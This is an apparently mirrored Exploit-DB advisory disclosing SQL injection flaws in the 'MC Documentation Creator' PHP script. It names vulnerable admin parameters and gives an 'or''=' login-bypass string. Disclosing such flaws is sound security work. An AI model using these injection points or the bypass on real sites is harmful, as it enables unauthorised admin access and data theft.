MC Documentation Creator Script – SQL Injection

• Exploit Database
• 13 阅读

• 作者： Ihsan Sencan
  日期： 2017-01-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41071/

• # # # # # 
  # Vulnerability: SQL Injection Web Vulnerability
  # Date: 15.01.2017
  # Vendor Homepage: http://microcode.ws/
  # Script Name: MC Documentation Creator
  # Script Buy Now: http://microcode.ws/product/mc-documentation-creator-php-script/3890
  # Author: İhsan Şencan
  # Author Web: http://ihsan.net
  # Mail : ihsan[beygir]ihsan[nokta]net
  # # # # # 
  # SQL Injection/Exploit :
  # http://localhost/[PATH]/admin/dashboard.php?doc=[SQL]
  # http://localhost/[PATH]/admin/dashboard.php?docedit=[SQL]
  # E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
  # 
  # Admin Login Bypass
  # http://localhost/[PATH]/admin/ and set Usename:'or''=' and Password to 'or''=' and hit enter.
  # # # # #